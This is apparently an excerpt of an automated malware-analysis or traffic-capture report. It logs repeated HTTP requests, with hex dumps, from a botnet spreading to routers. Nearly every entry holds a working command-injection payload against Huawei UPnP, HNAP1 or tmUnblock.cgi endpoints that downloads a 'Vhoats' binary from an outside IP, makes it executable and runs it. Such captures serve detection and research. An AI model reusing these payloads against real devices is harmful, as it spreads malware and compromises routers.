0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
